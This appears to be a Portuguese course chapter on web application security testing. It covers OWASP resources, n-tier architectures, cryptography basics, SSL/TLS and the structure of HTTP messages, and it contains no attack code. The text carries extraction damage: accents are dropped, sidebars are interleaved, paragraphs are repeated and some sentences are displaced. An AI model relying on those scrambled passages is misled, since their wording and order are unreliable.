1 Guia de desenvolvimento (Wiesmann et al., 2005): descreve as melhores prticas de

segurana para o projeto, desenvolvimento e implantao de sistemas e servios web
1 Guia de testes (Meucci et al., 2008): fornece metodologia e procedimentos detalhados para
a realizao de testes de invaso em aplicaes web, com cobertura das principais vulnerabilidades conhecidas. So apresentados testes caixa-preta e, tambm, caixa-cinza.
1 Guia de reviso de cdigo (Van der Stock et al., 2008): livro que ilustra como encontrar vulnerabilidades em aplicaes web, por meio da inspeo do cdigo-fonte.
Contm exemplos em diversas linguagens, como Java, C, C++ e ASP.
1 WebScarab: ferramenta escrita em Java, para ser utilizada em testes de segurana de

aplicaes web. A principal funcionalidade atuar como um proxy entre o navegador e
o servidor web, permitindo interceptar requisies e respostas e alter-las, se desejado.
Outras opes existentes permitem, por exemplo, automatizar testes de injeo, analisar
a aleatoriedade de identificadores de sesso e repetir requisies contidas no histrico.
e inclui diversos exemplos prticos de cdigos em JEE, ASP.NET e PHP.
1 WebGoat: uma aplicao web propositadamente insegura, criada com o objetivo de
ensinar os conceitos de segurana web e testes de invaso. Parte dos exemplos deste
texto baseada nessa ferramenta.
Arquiteturas e tecnologias de aplicaes web

Nos primrdios da internet, os servidores web forneciam, basicamente, contedo
esttico composto por documentos e imagens.

Tais recursos eram acessados pelos navegadores web, em um modelo cliente-servidor, no
qual o usurio no era capaz de fornecer nenhuma informao por meio da interface dispo-
nibilizada. O mximo permitido consistia na navegao por documentos, contendo assuntos

relacionados, que eram referenciados por meio de hiperlinks. Claramente, no possvel
classificar tais provedores de contedo como aplicaes web e, portanto, eles no so interessantes no contexto de testes de invaso abordado no presente documento. As vulnerabilidades que eram ento encontradas pertenciam apenas s plataformas subjacentes, como
o servidor web e o sistema operacional.
Observe que, nesse estgio inicial, os stios web eram centrados nos documentos e no
nos usurios. Diferentemente, uma aplicao web interage com as pessoas que a utilizam, recebendo, devolvendo e atualizando informaes contidas nas fontes de dados
da aplicao, de maneira dinmica.
Um fluxo comum de processamento compreende os seguintes passos (Shklar, 2009):
recebimento da requisio do usurio; interpretao da solicitao e subsequente encaminhamento; controle do acesso, por meio de autenticao e verificao dos privilgios;
acesso e atualizao de dados, de acordo com a lgica de negcio; personalizao da
resposta, para atender aos diversos tipos de aplicaes clientes e caractersticas nicas
dos usurios; e a transmisso da resposta para apresentao ao usurio.
As primeiras aplicaes web implementavam todas as etapas acima de maneira programtica, utilizando tecnologias como CGI e Servlets Java.
O grande problema que os sistemas eram monolticos, isto , as camadas de apresentao, lgica de negcios e de dados eram todas misturadas em um ou mais programas.
Assim, uma modificao incorreta no cdigo que construa uma tela poderia afetar uma
regra de manipulao de informao. Similarmente, a troca de um sistema gerenciador de
banco de dados por outro no podia ser feita transparentemente. Outro inconveniente
que o leiaute da pgina ficava sob a responsabilidade dos programadores, que, normalmente, no possuam as habilidades necessrias nessa arena.
Uma abordagem alternativa, visando minimizar esse problema, consiste na gerao de
pginas HTML a partir de modelos (templates) que se baseiam em estruturas de formatao e permitem uma quantidade limitada de cdigo embutido para incluso dinmica
de dados. Exemplos dessa soluo incluem o Cold Fusion, Apache Velocity e Server-Side
Includes (SSI), atuando em parceria com CGI.
Se por um lado o uso de modelos atendeu parcialmente o propsito de separar o contedo da
apresentao, por outro, pecou em limitar demasiadamente o poder e flexibilidade da abordagem centrada em cdigo. Por esse motivo, solues hbridas procuraram mesclar modelos
orientados a pginas com o poder oferecido pela programao, permitindo, assim, a incluso de
blocos inteiros de cdigo permeando estruturas de formatao. Contrariando as crenas iniciais,
a fuso das vantagens de cada um dos cenrios no teve resultado positivo, uma vez que, novamente, contedo e apresentao se tornaram indissociveis em um nico objeto (Shklar, 2009).
6
Saiba mais
Payment Card Industry
Data Security Standard
(PCI DSS) um padro
definido pelas bandeiras Visa, Mastercard,
American Express, JCB
e Discover para minimizar riscos envolvendo pagamentos com
cartes de crdito e
dbito. O padro est
organizado em doze
requisitos principais
que cobrem segurana
de redes, proteo de
dados de carto armazenados, transmisso
segura, segurana fsica e poltica de segurana, dentre outros.
Payment Card Industry
Payment Application
Data Security Standard
(PCI PA-DSS) um
padro mantido pelo
conselho PCI que tem
por objetivo auxiliar as
empresas de software
de pagamento eletrnico a desenvolver sistemas que no violem
requisitos prescritos
no PCI DSS e, assim,
no impedir estabelecimentos comerciais e
provedores de servios
a obter a certificao.
Solues hbridas procuraram mesclar modelos orientados a pginas com o poder
oferecido pela programao. Active Server Pages (ASP), da Microsoft, PHP e JavaServer
Pages (JSP), da Sun, foram tecnologias que enveredaram por esse caminho.
Embora ainda hoje seja possvel encontrar sistemas desenvolvidos com todas essas
tecnologias, aplicaes web modernas, normalmente, so construdas com base em um
modelo de n-camadas. O objetivo separar totalmente a lgica de negcio das camadas
de dados e de apresentao ao usurio e obter, com isso, total flexibilidade na seleo
de tecnologias e manuteno do sistema.
Para exemplificar, imagine uma aplicao que armazena informaes em arquivos de texto
e que, por algum motivo, um sistema gerenciador de bancos de dados deva ser adotado
no lugar. Como o acesso s informaes ocorre por meio de uma interface bem definida e
abstrata da camada de dados, a alterao no impacta o cdigo que as utiliza.
Java EE (Oracle, 2010) um exemplo de plataforma para execuo de aplicaes calcada no
conceito de mltiplas camadas. A primeira delas composta por navegadores web e aplicaes clientes que fazem interface com o usurio e se comunicam com o servidor Java EE.
A camada web responsvel pela gerao dinmica de contedo e transporte das informaes fornecidas pelo usurio at a camada de negcio. Ela emprega tecnologias como Servlets, JavaServer Pages, JavaServer Faces e JavaBeans. A terceira camada composta pelos
componentes que implementam a lgica de negcio da aplicao, que so construdos, por
exemplo, com Enterprise JavaBeans. Por fim, a ltima camada compreende servidores de
bancos de dados, sistemas legados e demais fontes de dados pertinentes, que so acessadas por tecnologias como Java Database Connectivity API (JDBC) e Java Persistence API.
importante entender como todos esses elementos so distribudos em servidores
e como so protegidos nas camadas de rede e de transporte. A Figura 1.3 ilustra uma
topologia cannica para implementao de um sistema em n-camadas.
O acesso de clientes a partir de redes no confiveis controlado por um firewall de borda
com capacidade adicional de inspecionar o trfego HTTP e bloquear ataques conhecidos.
Um conjunto de servidores web ou de aplicao responde pelas funcionalidades de apresentao, transportando informaes do usurio para os servidores de aplicaes, responsveis pela lgica de negcio, e formatando as respostas s requisies realizadas.
A ltima camada composta, normalmente, de servidores de bancos de dados e de sistemas
FW+WAF
Aplicaes
Clientes
Figura 1.3
Topologia de uma
aplicao em
n-camadas.
Camada de
apresentao
Camada de lgica
de negcio
Camada
de dados
legados. A Figura 1.4 enumera alguns exemplares de cada um dos componentes principais.
Componente
Exemplos
Camada de cliente
Navegadores web: Internet Explorer, Firefox e Chrome.

Aplicaes escritas em Java.
Microsoft Office.
Camada de apresentao
IIS.
Apache.
Tomcat.
WebSphere.
JBoss.
Oracle GlassFish.
Oracle WebLogic.
Apache Geronimo.
Camada de negcio
WebSphere.
JBoss.
Oracle GlassFish.
Oracle WebLogic.
Apache Geronimo.
Camada de dados
Oracle database.
MS SQL Server.
MySQL.
Firewall de aplicao
Apache ModSecurity.
Imperva SecureSphere WAF.
Cisco ACE WAF.
Barracuda WAF.
Figura 1.4
Exemplos dos
componentes de
uma aplicao em
n-camadas.
Requisitos de segurana
Que requisitos de segurana da informao podem ser atendidos por mecanismos criptogrficos?
Reviso de criptografia
Os primeiros vestgios de criptografia datam da poca dos egpcios, os quais utilizaram
hierglifos irregulares na representao de algumas informaes. O objetivo de tal prtica

era o de prover o sigilo da informao, que foi o nico requisito de segurana almejado pela
criptografia clssica e pr-moderna. Muitos dos algoritmos desenvolvidos nessas fases
foram utilizados na proteo de mensagens to importantes, como aquelas transmitidas
por governantes aos generais em batalha, mas nenhum deles foi construdo com uma forte
fundamentao e entendimento dos ataques possveis. Consequentemente, a maioria
desses mecanismos sucumbiu aos mais diversos ataques concebidos.
Pode-se dizer que esse perodo durou at o artigo seminal de Shannon (1949), que demonstrou a segurana incondicional do algoritmo one-time pad e introduziu o uso da matemtica nessa rea de estudo.
One-time pad
Cifra simtrica de
fluxo cuja segurana
incon-dicional, isto ,
independente-mente do
poder computacional
existente hoje e no
futuro, ou de avanos
na matemtica, no
possvel quebr-la.
A criptografia moderna, nascida desse marco, compreende um conjunto de tcnicas

matemticas e computacionais utilizado para atender os seguintes requisitos de segurana da informao: confidencialidade, integridade, irretratabilidade, autenticidade da
origem da mensagem e autenticidade de entidades.
1 Confidencialidade: requisito de segurana da informao que objetiva garantir que a

informao seja legvel somente para pessoas autorizadas.
1 Integridade: requisito de segurana da informao que objetiva garantir que a informao no seja alterada de maneira no autorizada ou desconhecida.
1 Irretratabilidade: tambm chamado de no repdio, um requisito de segurana da informao que tem por objetivo impedir que entidades neguem aes previamente realizadas.
1 Autenticidade: um requisito de segurana da informao que se desdobra em

autenticidade de entidades e autenticidade da origem da mensagem. No primeiro
caso, o objetivo corroborar a identidade de uma entidade e, no segundo, corroborar
a origem de uma informao.
Cifras
Cifras so mecanismos criptogrficos utilizados na proteo do sigilo da informao e

so compostos de uma transformao de ciframento e outra de deciframento.
Os esquemas de ciframento podem ser classificados em simtricos e assimtricos,
dependendo da relao entre as chaves.
A primeira recebe como entradas um texto em claro e uma chave de ciframento e resulta em
um texto cifrado, que prov a confidencialidade da informao. Logo, o texto cifrado pode ser
enviado para o destinatrio por canais potencialmente inseguros, sem o risco de um atacante
interceptar o canal de comunicao e violar o sigilo da mensagem. A segunda transformao
utilizada para recuperar o texto original a partir do texto cifrado e da chave de deciframento.
Alice
Beto
Chave de
ciframento
Algoritmo de
ciframento
Texto em
Algoritmo de claro
deciframento
Texto cifrado
Canal
inseguro
???
Figura 1.5
Modelo geral para
o uso de cifras.
$%^!,78g
@%*&():A
Eva
Texto em
claro
Chave de
deciframento
Cifras simtricas
Uma cifra dita simtrica ou de chave secreta quando fcil computacionalmente
determinar uma chave a partir da outra e, em muitos casos prticos, as duas so

iguais. Por esse motivo, as chaves devem ser conhecidas apenas pelas partes que participam da comunicao.
Os algoritmos dessa classe so rpidos e utilizam chaves relativamente pequenas. Um problema desses esquemas, porm, que o nmero de chaves em uma rede tende a ser grande.
Isso ocorre porque quaisquer duas entidades que queiram se comunicar de forma confidencial precisam compartilhar uma chave. Em uma rede com vrias entidades, considerando-se
que todo mundo deseja comunicar-se seguramente com o restante das pessoas do grupo,
o nmero total de chaves dado pelo nmero de combinaes de n, dois a dois, isto , Cn,2.
Outro problema fundamental nesse esquema o da distribuio segura de chaves, isto ,
como duas entidades podem partilhar uma chave sem que uma terceira parte no autorizada tome conhecimento dela. Essa troca de chaves pode ser feita presencialmente ou por
meio de protocolos criptogrficos para estabelecimento de chaves, como o protocolo
Diffie-Hellman, por exemplo.
As cifras simtricas podem ser classificadas em cifras de blocos e cifras de fluxo. As primeiras so aquelas que dividem o texto em claro em blocos de tamanho fixo e processam
um bloco por vez, com a mesma chave de ciframento. As cifras de fluxo, por sua vez, podem
ser consideradas cifras de blocos simples com tamanho unitrio, mas que podem variar a
chave de ciframento utilizada para transformar cada bloco. A sequncia de chaves utilizadas
chamada de fluxo de chaves.
Cifras assimtricas
Uma cifra chamada de assimtrica quando so utilizadas chaves diferentes para
ciframento (chave pblica) e deciframento (chave privada), mas que so relacionadas

matematicamente. Somente a ltima precisa ser mantida em sigilo e, naturalmente,
deve ser computacionalmente infactvel recuper-la a partir da chave pblica, que pode
ser distribuda livremente.
Essas cifras so muito mais lentas que as cifras simtricas e necessitam de chaves
maiores para garantir um mesmo nvel de segurana.
Por outro lado, o nmero de chaves utilizadas bem menor: cada entidade precisa apenas de
um par de chaves e, assim, em uma rede com n entidades, haver somente n pares de chaves.
Para ilustrar um problema inerente a essa classe de cifras, imagine o seguinte cenrio: Alice
deseja enviar uma mensagem secreta para Beto. Ela ento obtm a chave pblica dele de uma
fonte qualquer (uma pgina web, um anncio de jornal etc.), utiliza-a para cifrar a mensagem
10
e envia o resultado a Beto. Como somente Beto possui a chave privada correspondente,
somente ele capaz de recuperar a mensagem original. Mas o que aconteceria se Eva, curiosa
por saber das mensagens alheias, tivesse fornecido sua chave pblica Alice como sendo a
de Beto? Como Eva possui a chave privada correspondente, ela capaz de obter a mensagem
original de Alice e, em seguida, cifr-la com a chave pblica de Beto, enviando-lhe o resultado.
No fim desse cenrio, Alice no saberia que sua mensagem foi revelada a outra parte que no
Beto. O ataque foi possvel porque no se verificou a autenticidade da chave pblica utilizada,
o que pode ser realizado por meio de certificados de chave pblica.
Funes de hash criptogrficas

Uma funo de hash criptogrfica uma funo computacionalmente eficiente que
mapeia cadeias binrias de tamanho arbitrio para cadeias binrias de tamanho fixo
qualquer, chamadas de valores hash (Menezes et al., 2001).
Esses valores constituem uma espcie de impresso digital da cadeia mapeada e, por
isso, podem ser empregadas para verificao de integridade da informao.
Trs propriedades precisam ser satisfeitas, para que essas funes tenham utilidade
criptogrfica:
1 Resistncia da pr-imagem: para essencialmente qualquer valor hash, deve ser

computacionalmente infactvel encontrar uma entrada que seja mapeada para ele.
1 Resistncia da segunda pr-imagem: dado um elemento x qualquer e seu respectivo hash, deve ser computacionalmente infactvel encontrar um elemento diferente
de x que possua o mesmo hash.
1 Resistncia a colises: deve ser computacionalmente infactvel encontrar duas

entradas quaisquer e diferentes que possuam o mesmo hash. Essa propriedade
difere da anterior, porque h liberdade na escolha das duas entradas.
Graas a essas propriedades, funes de hash criptogrficas podem ser empregadas
para diversas finalidades, como:
1 Proteo de senhas em sistemas Unix/Linux: somente os hashes das senhas so

MD5
Message-Digest
algorithm 5. Funo
de hash criptogrfica
criada por Ron Rivest,
em 1992, e especificada
na RFC-1321. Teve
a propriedade de
resistncia a colises
quebrada em 2004,
por um grupo de
pesquisadores chineses.
Desde ento, diversos
ataques baseados na
vulnerabilidade foram
descritos na literatura.
armazenados em arquivos. Como pela resistncia da pr-imagem, infactvel recuperar uma senha a partir de um hash especfico, ela encontra-se protegida.
1 Verificao da integridade de arquivos: ao baixar arquivos grandes pela internet,

como as imagens de uma distribuio Linux, por exemplo, possvel verificar a integridade do que foi obtido, por meio do clculo do hash da imagem e comparao com o
hash fornecido pelo site. Por conta das ltimas duas propriedades, a probabilidade de
um arquivo corrompido gerar o mesmo hash da imagem ntegra praticamente nula.
Observe-se que esse uso no impede que uma entidade maliciosa troque o arquivo de
imagem e tambm o arquivo contendo o hash para verificao de integridade.
Desde o ataque de Wang e Yu (2005) contra o MD5, que resultou na violao da resistncia
a colises desse algoritmo, diversas outras funes de hash criptogrficas foram quebradas
e ataques significativos baseados no resultado dos pesquisadores chineses, descritos na
RSA
certificadoras que ainda assinavam os certificados com RSA+MD5, possibilitou a gerao de
Criptossistema
assimtrico baseado na
dificuldade de fatorao
de inteiros grandes.
Criado por Rivest,
Shamir e Adleman, foi
o primeiro algoritmo
a implementar o
conceito de criptografia
assimtrica, introduzido
por Diffie e Hellman.
um certificado digital vlido, com chave privada correspondente, de uma autoridade certificadora intermediria (Stevens et al., 2009). Tal ataque permite a emisso de certificados digitais fraudulentos, mas reconhecidos como autnticos pelos navegadores web e aplicaes.
MACs
Message Authentication Code (MAC) um mecanismo criptogrfico simtrico que tem
por objetivo prover integridade da informao e autenticidade da origem da mensagem.

Message Authentication Code (MAC) um mecanismo criptogrfico simtrico que tem por
objetivo prover integridade da informao e autenticidade da origem da mensagem. Aceita
como entradas uma mensagem e uma chave simtrica e gera como resultado um cdigo de
autenticao. Devido simetria da chave, que compartilhada entre os usurios de uma
literatura cientfica. O mais crtico deles foi o resultado que, aproveitando-se de autoridades
11
comunicao, no possvel garantir a irretratabilidade, pois qualquer um deles capaz de

gerar o mesmo MAC para uma dada mensagem.
As propriedades esperadas desses algoritmos esto listadas a seguir:
1 Facilidade de computao: dadas uma chave e uma mensagem fcil computar o
MAC correspondente.
1 Compresso: cadeias binrias de tamanho arbitrrio so mapeadas para cadeias

binrias de tamanho fixo.
1 Resistncia computao: deve ser computacionalmente infactvel computar, a

partir de um conjunto de pares (mensagem, MAC), o MAC de uma mensagem no
pertencente a esse conjunto, sem conhecimento da chave simtrica.
Dessas trs propriedades, a nica relacionada segurana a ltima. Caso ela seja quebrada, possvel forjar o MAC para uma mensagem e pass-la por autntica.
Assinaturas digitais
A assinatura digital uma primitiva criptogrfica essencial para prover autenticao da
origem da mensagem, integridade e irretratabilidade. Por meio desse mecanismo, uma

entidade capaz de associar a identidade dela a uma informao.
Diferentemente de assinaturas manuais, que so constantes, a assinatura digital varia de
acordo com a mensagem sendo assinada e um segredo conhecido apenas pelo signatrio.
A assinatura digital uma primitiva criptogrfica essencial para prover autenticao da
origem da mensagem, integridade e irretratabilidade. Por meio desse mecanismo, uma
entidade capaz de associar a identidade dela a uma informao. Diferentemente de assinaturas manuais, que so constantes, a assinatura digital varia de acordo com a mensagem
sendo assinada e um segredo conhecido apenas pelo signatrio. Se no fosse assim, seria
muito fcil falsificar assinaturas digitais, uma vez que bastaria copiar uma cadeia de bits
constante. Ainda nessa linha, um requisito importante para a efetividade do mecanismo
que deve ser computacionalmente infactvel construir uma mensagem para uma assinatura
existente, bem como gerar uma assinatura fraudulenta para uma mensagem qualquer.
Um esquema de assinaturas digitais consiste em um algoritmo de gerao e outro de verificao de assinaturas. O primeiro produz uma assinatura digital, em funo da mensagem e
chave privada do signatrio, enquanto que o segundo emprega a chave pblica e utilizado
para verificar se uma assinatura autntica, ou seja, se foi criada por uma dada entidade
sobre uma informao especfica. Embora a grande maioria desses mecanismos seja assimtrica, existem alguns esquemas simtricos, mas que dependem de uma terceira parte
confivel para execuo de ambos os processos.
Os esquemas de assinaturas digitais podem ser classificados em:
1 Esquemas de assinaturas digitais com apndice: requerem a mensagem original para

o processo de verificao.
1 Esquemas de assinaturas digitais com recuperao de mensagens: o processo de verificao no requer a mensagem original, que recuperada a partir da prpria assinatura.
Certificados digitais
Existe muita confuso na literatura e entre profissionais de segurana sobre o que realmente
um certificado digital. muito comum encontrar afirmaes de que ele serve para autenticar
uma entidade, como um servidor web, por exemplo. Mas isso est longe de ser a verdade.
12
O propsito de um certificado, na realidade, atestar a autenticidade da chave pblica
de uma entidade, condio que fundamental para o emprego de criptossistemas assimtricos (Menezes et al., 2001).
Isso obtido pela confiana depositada em uma terceira parte confivel, a autoridade
certificadora (AC), que assina digitalmente um documento eletrnico contendo informaes sobre uma dada entidade e a chave pblica autntica dela. Esses dados, mais
a assinatura digital, compem o certificado digital, que pode ser distribudo por canais
inseguros, sem o risco de adulterao indetectvel.
A emisso, como chamado o processo descrito, deve ocorrer apenas aps a AC, com a
diligncia devida, verificar documentos comprobatrios da identidade da entidade e que
ela tem a posse da chave privada associada. Para validar um certificado digital, necessrio verificar se a data atual est dentro do prazo de validade do certificado, se ele no
est revogado e se a assinatura digital da autoridade certificadora vlida (esse processo
executado recursivamente ao longo da cadeia de certificao). Essa ltima parte requer
a chave pblica autntica da AC, a qual pode ser obtida por meio de um certificado digital
emitido para ela, por uma AC de nvel superior, ou por meio de um certificado autoassinado,
caso seja uma AC raiz. Nesse ltimo caso, o certificado assinado com a prpria chave
privada associada chave pblica contida nele. Uma vez que qualquer pessoa pode gerar
um certificado assim, primordial que ele seja fornecido por um canal autntico e ntegro.
Protocolos SSL e TLS

O Secure Sockets Layer (SSL) uma pilha de protocolos desenvolvida pela Netscape, que
atua acima da camada de transporte, provendo servios de autenticao (mtua) de

entidades, autenticao da origem da mensagem, confidencialidade e integridade.
A verso 3 do SSL foi avaliada publicamente e deu origem ao Transport Layer Security (TLS)
IETF
Internet Engineering
Task Force uma
organizao aberta, sem
um processo formal
de filiao, que define
padres tecnolgicos
para a internet.
v1.0, padronizado pelo IETF.

Desse modo, preenche a lacuna existente na pilha TCP/IP, com relao a um mecanismo de
transporte seguro de informaes fim-a-fim. Os protocolos especificados pelo padro esto
ilustrados na Figura 1.6.
SSL Handshake
Protocol
SSL Change
Cipher Spec
SSL Alert
Protocol
HTTP
Telnet
SSL Record Protocol
Figura 1.6
Pilha de protocolos
do SSL.
IP
O protocolo SSL Record, representado na Figura 1.7, o responsvel pelos servios de

confidencialidade, integridade e autenticidade da origem da mensagem.
Ele utilizado pelos demais protocolos da pilha SSL e por protocolos da camada de aplicao, como o HTTP e o FTP, por exemplo. O dado de aplicao a ser transportado fragmentado em diversos blocos que so tratados individualmente. Em alguns casos, ocorre
compresso antes que o MAC seja calculado e adicionado ao final do bloco. O conjunto
cifrado com o algoritmo simtrico definido pelo handshake e, em seguida, adicionado o
TCP
13
cabealho SSL Record, que inclui a verso de SSL empregada e identificao do protocolo de
camada superior que processar o fragmento.
Dados da aplicao
Fragmentos
Compresso
Adio de MAC
Ciframento
Adio do cabealho
SSL Record
O prximo protocolo importante, executado no incio da conexo, o SSL Handshake (Figura 1.8),
que utilizado para autenticao do servidor (e eventualmente do cliente) e definio das
caractersticas de segurana a serem utilizadas na proteo do canal. No passo 1, o cliente
envia ao servidor as sutes criptogrficas suportadas, verso de protocolo, identificador de
sesso e um nmero gerado pseudoaleatoriamente. O servidor devolve uma mensagem
com a sute escolhida, verso do protocolo, outro nmero pseudoaleatrio e o mesmo identificador de sesso, caso o valor fornecido seja no nulo. O certificado digital do servidor
enviado no passo 2, juntamente com uma solicitao de certificado do cliente, caso a autenticao mtua tenha sido configurada. Nesse caso, esse certificado fornecido no passo 3,
quando tambm so enviadas informaes para o estabelecimento de chaves.
Na ltima etapa, os algoritmos selecionados so ativados por meio do protocolo SSL Change
Cipher Spec e a mensagem finished, enviada protegida com os novos parmetros, utilizada para
verificar se o protocolo transcorreu com sucesso. Isso s possvel se cada uma das partes conseguir decifrar corretamente essa ltima mensagem enviada. Por fim, o SSL Alert Protocol utilizado para transportar mensagens de alerta entre os pares de uma sesso SSL. Cada mensagem
composta de apenas dois bytes, que indicam a severidade do alerta e a notificao especfica.
14
Figura 1.7
SSL Record
Protocol.
Cliente
Servidor
clien
t_he
llo
(1)
hell
rver_
se
cat
certi
nge
xcha
y_e
r_ke
serv
ques
te_re
ca
certi
done
ello_
r_h
erve
Tempo
(2)
certi
cat
clien
t_key
_exc
certi
hang
cat
chan
(3)
e_ve
rify
ge_c
iphe
r_sp
ec
nis
hed
chan
ec
r_sp
he
e_cip
(4)
hed
Segurana da informao
Que primitivas criptogrficas satisfazem a cada um dos requisitos de segurana da informao?
Qual o propsito de um certificado digital?
Figura 1.8
SSL Handshake.
nis
15
Reviso dos protocolos HTTP e HTTPS

HyperText Transfer Protocol (HTTP) um protocolo da camada de aplicao, que opera
como cliente-servidor e no orientado a conexo. Os recursos so identificados de

maneira nica por meio de Uniform Resource Locators (URLs). HTTP no possui nativamente nenhum mecanismo para proteger os dados.
HTTPS empregado para transporte de dados sigilosos em aplicaes bancrias e de
comrcio eletrnico.
HTTP um protocolo da camada de aplicao, utilizado na distribuio de documentos de
hipertexto, os quais so a base da World Wide Web (Fielding et al., 1999). Esta foi a grande
responsvel pela popularizao da internet e a face mais conhecida da rede mundial.
No incio, os recursos acessados por meio de HTTP eram todos estticos, bem diferente dos
dias de hoje, em que o contedo gerado dinamicamente, de acordo com a interao do
usurio com o site.
O protocolo opera no estilo cliente-servidor, no qual o navegador web (cliente) realiza uma
requisio de recurso a um servidor web, que responde com o contedo solicitado, se existir.
HTTP no orientado conexo e, assim, um protocolo que no mantm estado das conversaes. O transporte dos dados, normalmente, realizado por meio de TCP/IP, mas isso
no um requisito; basta que o protocolo utilizado fornea entrega confivel. Apesar disso,
o HTTP no orientado conexo e, assim, um protocolo que no mantm o estado das
conversaes. Considerando como era utilizado nos primrdios, isso, de fato, no era uma
necessidade. Os recursos so identificados de maneira nica por meio de Uniform Resource
Locators (URLs), que correspondem aos endereos que usurios digitam nos navegadores
para acessarem sites especficos. Uma URL define o protocolo de acesso, o servidor do
recurso, porta utilizada, caminho no servidor at o elemento, nome do recurso e parmetros.
Note que nem todos esses itens so obrigatrios em uma requisio.
O protocolo HTTP no possui nativamente nenhum mecanismo para proteger os
dados que carrega.
Assim, informaes podem ser adulteradas, injetadas ou removidas, de maneira no autorizada, durante o trnsito at o cliente ou servidor. Para preencher essa lacuna, o HTTP pode
ser utilizado sobre os protocolos SSL ou TLS, que fornecem servios para autenticao de
entidades, autenticao da origem da mensagem, integridade e sigilo do canal de comunicao. Esse o padro conhecido como HTTPS e empregado para transporte de dados
sigilosos em aplicaes bancrias e de comrcio eletrnico, por exemplo.
Requisio
Para acessar um recurso em um servidor, uma requisio HTTP deve ser realizada pelo
cliente, de acordo com um formato pr-estabelecido, contendo trs sees. A primeira
consiste em uma linha descrevendo a requisio; em seguida, diversas linhas compem
os cabealhos HTTP pertinentes; a terceira seo, opcional, corresponde ao corpo da
mensagem e deve vir separada da segunda, por uma linha em branco.
Como ilustrao, considere que um usurio deseja ver o site da Escola Superior de Redes da
RNP, utilizando o navegador Firefox. A seguinte requisio feita pelo software:
GET http://esr.rnp.br:80/ HTTP/1.1

Host: esr.rnp.br
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR;
16
rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729)

Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
A primeira linha sempre composta por um mtodo HTTP (GET), o recurso identificado por
uma URL (http://esr.rnp...) e a verso do protocolo utilizada (HTTP/1.1). As demais linhas do
exemplo so cabealhos, que identificam, entre outras coisas, o nome de domnio do servidor, o navegador utilizado, o tipo de sistema operacional do cliente e tipos de contedos e
codificaes aceitos.
Resposta
A resposta do servidor a uma requisio, tambm, composta por trs sees:
1 Linha de estado descrevendo o protocolo e verso utilizados, cdigo de estado e um
valor textual, que no interpretado, hoje, pelos navegadores.
1 Sequncia de cabealhos fornecendo informaes como data, servidor e tipo do contedo.

1 Contedo referente ao recurso solicitado, separado das sees anteriores, por uma
ou mais linhas em branco.
O resultado da requisio da seo anterior est ilustrado a seguir. importante mencionar
que uma resposta pode gerar novas requisies, caso o contedo apresentado possua elementos como imagens e scripts com especificao de arquivos.
HTTP/1.1 200 OK
Date: Thu, 09 Sep 2010 01:07:53 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.4
Set-Cookie: esr=1fa7bce201555382a9e901fff3b3a1fc1226489b; path=/;
domain=rnp.br
Set-Cookie: esr_data=yQdWXrdxCb%2BhaHkaiwD715%2F4PVrGe%2BqfoMX81a1
CksCHNB6J%2BjI%2BrffuKXrlCbCi; path=/; domain=rnp.br
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
HhYkDN7bUE1ZP5KN6WkNVBhhA%2Fi3nlB6rALyd7x8qVoIqu8fINFYFqA; path=/;
domain=rnp.br
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
X-Content-Encoding: gzip
Content-length: 4965
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN
/_dtd/xhtml1-transitional.dtd><html xml:lang=pt-br lang=ptbr><head><meta http-equiv=Content-Type content=text/html;
Set-Cookie: esr_data=vsppYJJlddvBfXVW%2FPC%2FAPH7zwMPGzJTMKgMALrli
charset=iso-8859-1 /><title>Escola Superior de Redes</title>

...
17
Mtodos
H oito mtodos, ao todo, especificados pelo protocolo HTTP, os quais indicam a ao
solicitada pela requisio. Os dois mais importantes, no escopo desse texto, so os

mtodos GET e POST.
O primeiro utilizado para solicitar pginas ao servidor e permite que parmetros sejam
passados como parte da URL do recurso. Isso implica que informaes sensveis no devem
ser passadas por meio de GET, pois elas sero exibidas em histricos de navegadores e
registradas em trilhas de auditoria, no servidor web. O mtodo POST empregado para
submeter aes ao servidor e os parmetros podem ser passados como parte do corpo da
mensagem e, tambm, da URL.
Cdigos de estado
Cdigos de estado so valores numricos de trs dgitos, que fazem parte da primeira
linha da resposta do servidor a uma requisio e denotam o resultado da solicitao.

So divididos em cinco classes, de acordo com o significado:
1 1xx: cdigos de informao. Atualmente, so raramente utilizados.

1 2xx: indicam que a requisio foi atendida com sucesso. Ex.: 200 OK resposta padro,
quando o recurso provido sem erros.
1 3xx: informam que o cliente precisa realizar aes adicionais para completar a requisio. Ex.: 301 Moved Permanently faz com que requisies subsequentes da URL
solicitada sejam permanentemente redirecionadas para a informada na mensagem.
1 4xx: enviadas quando a requisio no pode ser atendida, por erro de sintaxe, falta de
autorizao ou porque o recurso no foi encontrado. Ex.: 404 Not Found o recurso no
pde ser encontrado no servidor.
1 5xx: indicam erros no servidor que o impediram de atender a requisio. Ex.: 501 Not
Implemented o servidor no suporta o mtodo solicitado.
Cabealhos
Os cabealhos compem a segunda seo das requisies e respostas e definem vrias
caractersticas importantes de ambas. So compostos pelo nome e o valor, separados

pelo sinal de dois-pontos e listados um por linha.
Os itens a seguir explicam alguns dos cabealhos encontrados nos exemplos anteriores:
1 Host: nome de domnio do servidor.
18
1 User-Agent: indica a aplicao cliente que gerou a requisio.

1 Accept: tipos de contedo aceitos pela aplicao cliente.
1 Server: nome do servidor e informaes do sistema operacional. Se nenhum mecanismo de camuflagem for utilizado, pode ser empregado para identificao do elemento,
durante a fase de reconhecimento em um ataque.
1 Set-Cookie: define um cookie no navegador, que um dos mecanismos utilizados para

manter uma sesso, no protocolo HTTP.
1 Expires: determina a validade do corpo da mensagem, isto , at que instante o navegador pode utiliz-lo, a partir de uma cpia local, sem necessitar realizar novas requisies para o mesmo recurso.
1 Content-Length: o comprimento em bytes do corpo da mensagem.
Cookies
Um cookie um elemento do protocolo HTTP, enviado ao navegador pelo servidor, com
